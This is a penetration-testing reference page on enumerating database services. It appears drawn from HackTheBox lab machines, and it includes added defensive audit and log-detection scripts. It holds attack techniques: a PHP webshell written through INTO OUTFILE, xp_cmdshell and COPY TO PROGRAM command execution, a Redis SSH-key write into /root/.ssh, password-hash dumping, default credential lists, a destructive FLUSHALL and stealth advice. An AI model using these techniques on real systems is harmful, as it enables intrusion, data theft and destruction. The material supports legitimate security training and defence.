# Database Enumeration

## Overview

Database services run on well-known ports (MySQL/MariaDB on 3306, MSSQL on 1433, PostgreSQL on 5432, Oracle on 1521, MongoDB on 27017, Redis on 6379) and are frequent targets for enumeration. The goal is to identify the DBMS and version, test default credentials, enumerate accessible databases/tables, and assess stored procedure capabilities (e.g., xp_cmdshell on MSSQL). Databases often contain credentials, personal data, and application secrets, making them high-value targets for both initial access and post-exploitation data gathering.

## Prerequisites
- Tools: nmap (service detection and NSE scripts), DB-specific clients (mysql, psql, sqlcmd, mssqlclient.py, redis-cli, mongo), Hydra, netexec
- Access Level: Network access to database ports; credentials may be required
## Detection & Enumeration

### Service Detection and Version Identification

```bash
# nmap service detection for database ports
nmap -sV -p 1433,3306,5432,1521,27017,6379 10.10.10.161

# nmap database-specific NSE scripts
nmap --script ms-sql-info -p 1433 10.10.11.236
nmap --script mysql-info -p 3306 10.10.10.161
nmap --script pgsql-brute -p 5432 10.10.10.161
nmap --script oracle-tns-version -p 1521 10.10.10.161
nmap --script mongodb-info -p 27017 10.10.10.161
nmap --script redis-info -p 6379 10.10.10.161
```
### Default Credential Testing
Test these first before attempting brute-force:
| DBMS | Common Defaults |
|---|---|
| MySQL/MariaDB | root:(blank), root:root, root:toor, admin:admin |
| MSSQL | sa:(blank), sa:sa, sa:password, MSSQL$SQLEXPRESS with Windows auth |
| PostgreSQL | postgres:(blank), postgres:postgres, postgres:password |
| Oracle | system:manager, sys:change_on_install, scott:tiger, dbsnmp:dbsnmp |
| MongoDB | (no auth by default on older versions) |
| Redis | (no auth by default; if auth enabled, check redis.conf) |
### MySQL / MariaDB (Port 3306)

```bash
# Connect with client
mysql -h 10.10.10.161 -u root -p
mysql -h 10.10.10.161 -u root --password=""
```

Enumeration commands after connection:

```sql
SHOW DATABASES;
USE <database_name>;
SHOW TABLES;
SELECT * FROM <table_name>;
SELECT User, Host, authentication_string FROM mysql.user;  -- MySQL 5.7+
SELECT User, Host, Password FROM mysql.user;               -- MySQL 5.6 and below

-- Read local files (requires FILE privilege)
SELECT LOAD_FILE('/etc/passwd');

-- Write to files (requires FILE privilege) -- used for webshells
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

-- Check MySQL version for privilege escalation paths
SELECT VERSION();
SHOW VARIABLES LIKE '%version%';

-- Check user privileges
SHOW GRANTS FOR CURRENT_USER;

-- UDF (User Defined Function) privilege escalation check
SHOW VARIABLES LIKE 'plugin_dir';

-- Credentials in application database tables
SELECT * FROM <app_db>.users;
```
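The default-credential table and the `mysql.user` queries above are exactly the data a DBA can audit before anyone else does. The block below is an added example, not code from the original page: it takes rows shaped like the output of `SELECT User, Host, plugin, authentication_string FROM mysql.user` (constructed inline here), recomputes the `mysql_native_password` hash of each default password from the table so stored hashes can be compared without logging in, and flags empty passwords, default passwords, the pre-4.1 16-character hash format noted under Common Pitfalls, and `root` accounts reachable from any host. The `SAMPLE_ROWS` data, the `s3cr3t-constructed` password and the finding texts are assumptions.

```python
"""Audit mysql.user rows for empty, default, legacy-format and over-exposed accounts.

Added example (not from the original page). Rows are constructed to look like
the output of:
    SELECT User, Host, plugin, authentication_string FROM mysql.user;
On MySQL 5.6 and older the hash is in the Password column and the plugin is
implicitly mysql_native_password; pass that column in the same position.
"""
import hashlib
import re

# Passwords from the default-credential table; hashed below so the audit can
# compare against stored authentication_string values without logging in.
DEFAULT_PASSWORDS = ["", "root", "toor", "admin", "password"]

NEW_HASH_RE = re.compile(r"^\*[0-9A-F]{40}$")  # 4.1+ mysql_native_password: '*' + 40 hex
OLD_HASH_RE = re.compile(r"^[0-9a-f]{16}$")     # pre-4.1 OLD_PASSWORD() format: 16 hex


def mysql_native_hash(password: str) -> str:
    """mysql_native_password hash: '*' + uppercase hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def hash_format(auth_string: str) -> str:
    """Classify a stored hash as 'blank', 'old' (pre-4.1), 'new' (4.1+) or 'other'."""
    if auth_string == "":
        return "blank"
    if OLD_HASH_RE.match(auth_string):
        return "old"
    if NEW_HASH_RE.match(auth_string):
        return "new"
    return "other"  # caching_sha2_password ($A$...), auth_socket, etc.


def audit_accounts(rows):
    """Return (user@host, finding) tuples for rows that need attention."""
    default_hashes = {mysql_native_hash(p): (p or "(blank)") for p in DEFAULT_PASSWORDS}
    findings = []
    for user, host, plugin, auth in rows:
        account = f"{user}@{host}"
        fmt = hash_format(auth)
        # auth_socket / unix_socket accounts legitimately store no hash at all.
        if fmt == "blank" and plugin not in ("auth_socket", "unix_socket"):
            findings.append((account, "empty password: anyone who reaches the port can log in"))
        elif fmt == "old":
            findings.append((account, "pre-4.1 16-character hash: weak format, reset the password"))
        elif auth in default_hashes:
            findings.append((account, f"password is the default '{default_hashes[auth]}'"))
        if user == "root" and host == "%":
            findings.append((account, "root may log in from any host: restrict Host to localhost"))
    return findings


# Constructed sample rows (not real data).
SAMPLE_ROWS = [
    ("root", "localhost", "auth_socket", ""),                           # socket auth: fine
    ("root", "%", "mysql_native_password", mysql_native_hash("root")),  # default password, any host
    ("app", "10.0.0.%", "mysql_native_password", mysql_native_hash("s3cr3t-constructed")),
    ("legacy", "%", "mysql_native_password", "5d2e19393cc5ef67"),       # pre-4.1 hash
    ("admin", "localhost", "mysql_native_password", ""),                # empty password
]

if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_ROWS):
        print(f"{account}: {finding}")
```

Run against the sample rows it reports four findings: the remote `root` account twice (default password and `%` host), the legacy hash, and the blank `admin` password; the `auth_socket` root is deliberately left alone. MySQL 8's default `caching_sha2_password` hashes match neither regex and come back as `other`, which is expected; only `mysql_native_password` values can be compared against the default list this way.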
### Microsoft SQL Server (Port 1433)

```bash
# Impacket mssqlclient (Windows authentication)
impacket-mssqlclient domain/user:pass@10.10.11.236 -windows-auth
impacket-mssqlclient manager/operator:operator@manager.htb -windows-auth

# SQL authentication
impacket-mssqlclient sa:password@10.10.10.161
```

Commands at the `SQL>` prompt:

```sql
SELECT @@VERSION;                -- SQL Server version
SELECT name FROM sys.databases;  -- List databases
SELECT DB_NAME();                -- Current database
USE <db>;                        -- Switch database
SELECT name FROM sys.tables;     -- Current DB tables
SELECT * FROM <table>;

-- xp_dirtree: list filesystem directories (no xp_cmdshell needed)
xp_dirtree C:\
xp_dirtree \inetpub\wwwroot\

-- xp_cmdshell: command execution (must be enabled)
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell 'whoami';

-- Check xp_cmdshell status
EXEC sp_configure 'xp_cmdshell';

-- Linked servers (lateral movement)
SELECT * FROM sys.servers;
EXEC ('SELECT @@VERSION') AT [LINKED_SERVER_NAME];

-- Enumerate SQL logins
SELECT name, type_desc, is_disabled FROM sys.server_principals WHERE type IN ('S','U');
SELECT name FROM sys.database_principals;
```

MSSQL enumeration via netexec:

```bash
netexec mssql 10.10.10.161 -u sa -p password --local-auth
netexec mssql 10.10.10.161 -u user -p pass -d domain.htb -M mssql_priv
```
### PostgreSQL (Port 5432)

```bash
# Connect locally or remotely
psql -h 10.10.10.161 -U postgres
psql -h 10.10.10.161 -U postgres -d template1
```

Enumeration commands inside psql:

```sql
-- List databases
\list
-- Connect to a database
\c <database_name>
-- List tables in current database
\dt
SELECT * FROM <table_name>;
SELECT current_user;
SELECT version();

-- Read files (requires superuser)
CREATE TABLE read_file(output text);
COPY read_file FROM '/etc/passwd';
SELECT * FROM read_file;

-- RCE via COPY FROM PROGRAM (requires superuser, PG 9.3+)
COPY (SELECT '') TO PROGRAM 'id';

-- User defined functions for privilege escalation
SELECT lanname, lanpltrusted FROM pg_language;
```
### Oracle (Port 1521)

```bash
# nmap TNS enumeration
nmap --script oracle-sid-brute -p 1521 10.10.10.161
nmap --script oracle-tns-version -p 1521 10.10.10.161

# ODAT (Oracle Database Attacking Tool) -- enumeration
odat all -s 10.10.10.161 -p 1521

# tnscmd (TNS command tool)
tnscmd10g version -h 10.10.10.161 -p 1521

# SQL*Plus connection (if credentials found)
sqlplus system/password@10.10.10.161:1521/XE
```

Basic Oracle enumeration after connection:

```sql
SELECT * FROM all_users;
SELECT name FROM v$database;
SELECT * FROM v$version;
```
### NoSQL Databases

#### MongoDB (Port 27017)

```bash
# Connect (no auth on many default installs)
mongo 10.10.10.161
```

Enumeration commands in the mongo shell:

```javascript
show dbs;
use <database>;
show collections;
db.<collection>.find().pretty();
db.getUsers();
show roles;
```

#### Redis (Port 6379)

```bash
# Connect (no auth on default installs)
redis-cli -h 10.10.10.161
```

Enumeration commands in redis-cli:

```text
INFO           # Server information and statistics
CLIENT LIST    # Connected clients
CONFIG GET *   # Server configuration (may contain passwords)
KEYS *         # List all keys
GET <key>      # Retrieve key value
FLUSHALL       # Delete all keys (destructive!)

# RCE via Redis (write SSH key or cron job if running as root)
CONFIG SET dir /root/.ssh/
CONFIG SET dbfilename authorized_keys
SET key "\\n\\n<ssh-public-key>\\n\\n"
SAVE
```
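The `CONFIG SET dir` / `dbfilename` / `SAVE` sequence above only works because an unauthenticated client can reach `CONFIG` at all. The block below is an added example, not code from the original page or from the Redis project: it parses `redis.conf`-style directives (three constructed configurations are embedded inline) and reports the settings that leave an instance enumerable and writable from the network, including the protected-mode rule that only shields an instance when it has neither a `bind` directive nor a password. The directive names are real Redis options; the file contents, the `CHANGE-ME-placeholder` password and the finding texts are constructed.

```python
"""Audit redis.conf directives for network exposure and dangerous commands.

Added example (not from the original page or the Redis project). The three
configurations below are constructed; only the directive names are real.
"""
import shlex

# Constructed: the kind of config behind the "no auth on default installs" note.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed: no bind line at all. protected-mode still confines an
# unauthenticated instance to loopback, so it is not network-reachable.
DEFAULT_CONF = """\
protected-mode yes
port 6379
"""

# Constructed: loopback only, password set, CONFIG and FLUSHALL disabled.
HARDENED_CONF = """\
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass "CHANGE-ME-placeholder"
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
dbfilename dump.rdb
"""


def parse_conf(text):
    """Return {directive: [argument-list, ...]}; directives such as rename-command repeat."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)  # handles the quoted "" used to disable a command
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def is_loopback(addr):
    a = addr.lstrip("-")  # Redis 7 allows a '-' prefix meaning "skip if unavailable"
    return a.startswith("127.") or a in ("::1", "localhost")


def audit_redis_conf(text):
    """Return a list of finding strings for the given redis.conf text."""
    conf = parse_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args]
    protected = conf.get("protected-mode", [["yes"]])[-1][0].lower() == "yes"
    has_auth = any(args and args[0] for args in conf.get("requirepass", [])) or "user" in conf
    disabled = {args[0].upper() for args in conf.get("rename-command", [])
                if len(args) == 2 and args[1] == ""}

    if binds:
        network_reachable = not all(is_loopback(b) for b in binds)
    else:
        # No bind directive: Redis listens on every interface, but protected-mode
        # refuses non-loopback clients as long as no password is configured.
        network_reachable = has_auth or not protected

    if not has_auth:
        findings.append("no requirepass or ACL users: every client that connects has full access")
    if network_reachable:
        findings.append("accepts connections on non-loopback addresses"
                        + ("" if has_auth else " without authentication"))
    if "CONFIG" not in disabled:
        findings.append("CONFIG is enabled: dir/dbfilename can be repointed so SAVE writes "
                        "an RDB file anywhere the redis process can write")
    if "FLUSHALL" not in disabled:
        findings.append("FLUSHALL is enabled: one command deletes every key")
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("default", DEFAULT_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or "no findings")
```

The weak configuration produces all four findings, the bind-less default produces three (it is not reachable from the network, but it still has no authentication and both commands enabled), and the hardened one produces none. Whether the process runs as root, which is what turns the RDB write into a privilege escalation, is a property of the service unit rather than of `redis.conf`, so it has to be checked separately.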
#### CouchDB (Port 5984)

```bash
curl http://10.10.10.161:5984/
curl http://10.10.10.161:5984/_all_dbs
curl http://10.10.10.161:5984/_users/_all_docs
```
## Additional Database Commands

```bash
# NetExec MSSQL modules
nxc mssql <target> -u sa -p pass --local-auth                              # Local authentication
nxc mssql <target> -u sa -p pass --query 'SELECT name FROM sys.databases'  # Execute SQL query
nxc mssql <target> -u sa -p pass -M mssql_priv                             # Check MSSQL privileges
nxc mssql <target> -u sa -p pass --put-file local_file remote_path         # Upload file
nxc mssql <target> -u sa -p pass --get-file remote_path local_file         # Download file

# MySQL SSL bypass
mysql -h 10.10.10.10 -u root -p --skip-ssl          # Connect without SSL/TLS (e.g. when the server certificate fails verification)
mysql -h 10.10.10.10 -u root -p -e "SHOW GRANTS"    # Check user grants

# Redis authenticated access
redis-cli -h 10.10.10.10 CONFIG GET requirepass     # Check if password is set
redis-cli -h 10.10.10.10 -a <password> PING         # Authenticate and test connection

# MongoDB no-auth enumeration
mongo --host 10.10.10.10 --eval 'db.adminCommand({listDatabases:1})'
mongo --host 10.10.10.10 --eval 'db.getCollectionNames()'  # List collections
```
## Common Pitfalls

- MSSQL authentication with `-windows-auth` requires the domain to resolve. Ensure the DC hostname is in `/etc/hosts`.
- MySQL old_password vs new_password format (pre-4.1 vs 4.1+). Old hashes (16 bytes) can be cracked differently from new ones (41 bytes starting with `*`).
- Oracle SID brute-forcing takes time. Common SIDs to try first: XE, ORCL, ORACLE, TEST, DEV, PROD.
- MSSQL `xp_dirtree` works without `xp_cmdshell` enabled. This is a critical distinction -- you can enumerate files even without command execution.
- Redis keys may be binary-encoded. Use `DUMP <key>` for a hex representation if `GET` returns garbled output.
- MongoDB authentication may use SCRAM-SHA-1 or x.509 certificates. Unauthenticated access is possible on older versions.
- Database services may listen only on `127.0.0.1` -- not externally exposed. Check with `ss -tlnp` or `netstat -ano` after gaining a foothold.
## OPSEC Considerations
- Database connection attempts are logged by all major DBMS (MySQL general_log, MSSQL SQL Server Log, PostgreSQL pg_log). Connection source IP, username, and timestamp are recorded.
- Failed login attempts generate error log entries. Multiple failed attempts from the same IP trigger account lockout or IP-based blocking on some configurations.
- `xp_cmdshell` usage on MSSQL is a critical security event. Enabling it triggers SQL Server audit events. Using xp_dirtree for filesystem enumeration is stealthier.
- `SHOW DATABASES` and schema enumeration generate query log entries. A session that connects and immediately enumerates schemas is a reconnaissance IOC.
- Redis INFO and CONFIG GET commands reveal server internals. These are standard admin commands but unusual from unexpected IPs.
- MongoDB unauthenticated access is an audit finding in itself. Many vulnerability scanners flag open MongoDB instances.
- Database brute-force (Hydra, medusa against MySQL/MSSQL/PG ports) is extremely noisy and generates one log entry per failed attempt. Avoid unless absolutely necessary.
- Connections from attacker IPs to database ports are logged by network firewalls. Database ports (3306, 1433, 5432) should never accept connections from non-application IPs.
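The logging behaviour listed above (one error-log entry per failed login, audit events when `xp_cmdshell` is enabled) is straightforward to turn into detection logic. The block below is an added example, not code from the original page or from any vendor tooling: it parses a constructed SQL Server ERRORLOG excerpt whose message texts follow the format SQL Server writes for failed logins and `sp_configure` changes, and raises alerts for a burst of failed logins from one client, a successful login from a client that was just failing, and the `show advanced options` / `xp_cmdshell` configuration changes that the MSSQL section performs. The sample lines, the client addresses, the thresholds and the alert names are assumptions.

```python
"""Detect password guessing and xp_cmdshell enablement in a SQL Server ERRORLOG.

Added example (not from the original page). The log lines are constructed but
follow the layout SQL Server writes: timestamp, source column, message text.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed ERRORLOG excerpt: a short guessing burst against 'sa', a success,
# then xp_cmdshell being switched on, plus one unrelated failure elsewhere.
SAMPLE_ERRORLOG = """\
2024-03-01 09:14:02.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-01 09:14:02.41 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-01 09:14:02.77 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-01 09:14:03.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-01 09:14:03.30 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-01 09:14:03.58 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 10.10.14.5]
2024-03-01 09:15:10.00 spid57      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 09:15:10.20 spid57      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-01 11:40:00.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.5.20]
"""

LINE_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) (\S+)\s+(.*)$")
CLIENT_RE = re.compile(r"\[CLIENT: ([^\]]+)\]")
CONFIG_RE = re.compile(r"Configuration option '([^']+)' changed from (\d+) to (\d+)")

FAIL_THRESHOLD = 5                  # failed logins from one client ...
FAIL_WINDOW = timedelta(minutes=5)  # ... within this window


def parse_errorlog(text):
    """Return (timestamp, source, message) for each well-formed log line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group(2), m.group(3)))
    return events


def detect(text):
    """Return (alert, subject, detail) tuples in log order."""
    alerts = []
    recent_failures = defaultdict(list)  # client IP -> timestamps of recent failed logins
    for ts, source, msg in parse_errorlog(text):
        client = CLIENT_RE.search(msg)
        ip = client.group(1) if client else "unknown"
        if msg.startswith("Login failed for user"):
            window = [t for t in recent_failures[ip] if ts - t <= FAIL_WINDOW] + [ts]
            recent_failures[ip] = window
            if len(window) == FAIL_THRESHOLD:  # fire once, when the threshold is crossed
                alerts.append(("brute_force", ip,
                               f"{FAIL_THRESHOLD} failed logins within {FAIL_WINDOW}"))
        elif msg.startswith("Login succeeded for user") and recent_failures.get(ip):
            alerts.append(("success_after_failures", ip,
                           "login succeeded after failed attempts from the same client"))
        cfg = CONFIG_RE.search(msg)
        if cfg:
            option, old, new = cfg.groups()
            if option == "xp_cmdshell" and new == "1":
                alerts.append(("xp_cmdshell_enabled", source,
                               "xp_cmdshell switched on: OS command execution as the service account"))
            elif option == "show advanced options":
                alerts.append(("advanced_options_changed", source,
                               f"'show advanced options' {old}->{new}: usual prelude to enabling xp_cmdshell"))
    return alerts


if __name__ == "__main__":
    for alert, subject, detail in detect(SAMPLE_ERRORLOG):
        print(f"{alert:24} {subject:12} {detail}")
```

On the sample excerpt this yields four alerts in order: the guessing burst from `10.10.14.5`, the success that follows it, the `show advanced options` change and the `xp_cmdshell` enablement, both attributed to `spid57`. The single failure from `10.0.5.20` stays below the threshold. The same message texts also reach the Windows Application event log, so the parser can be pointed at an exported event list with only the line regex changed.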
## Post-Exploitation Value
- Database credentials often match credentials for other services (SSH, WinRM, RDP) due to password reuse.
- Application databases contain user tables with credentials (hashed or cleartext) for the web application.
- MSSQL `xp_cmdshell` provides command execution as the SQL Server service account (often SYSTEM or a domain account).
- PostgreSQL `COPY FROM PROGRAM` provides command execution as the postgres user from version 9.3+.
- MySQL `SELECT LOAD_FILE()` can read sensitive files like `/etc/passwd` or web config files if the FILE privilege is granted.
- Redis RCE via SSH key/cron job write provides privilege escalation when Redis runs as root.
- Linked servers in MSSQL provide lateral movement paths to other database servers in the network.
## Cross-References

### Tool References
| Tool | Description | Link |
|---|---|---|
| mysql | MySQL/MariaDB client | Built into most Linux distros |
| psql | PostgreSQL client | Built into most Linux distros |
| sqlcmd / osql | MSSQL command-line clients (Windows) | Built into Windows / SQL Server |
| mssqlclient.py | Impacket MSSQL client (cross-platform) | https://github.com/fortra/impacket |
| ODAT | Oracle Database Attacking Tool | https://github.com/quentinhardy/odat |
| redis-cli | Redis command-line client | Built into Redis installation |
| mongo | MongoDB shell client | https://www.mongodb.com/try/download/shell |
| netexec (nxc) | Multi-protocol pentesting with MSSQL module | https://github.com/Pennyw0rth/NetExec |
| nmap (NSE scripts) | Database service detection and brute-force | https://nmap.org/ |
### Source Machines
- Manager (Medium, AD/Windows) -- MSSQL on port 1433, accessed with operator:operator credentials via Windows auth; xp_dirtree reveals website backup ZIP in web root
- BoardLight (Easy, Linux) -- MySQL on localhost (3306), credentials from conf.php (dolibarrowner:serverfun2$2023!!)
- Cascade (Medium, AD) -- SQLite database (Audit.db) found on SMB share, sqlitebrowser used to inspect encrypted LDAP credentials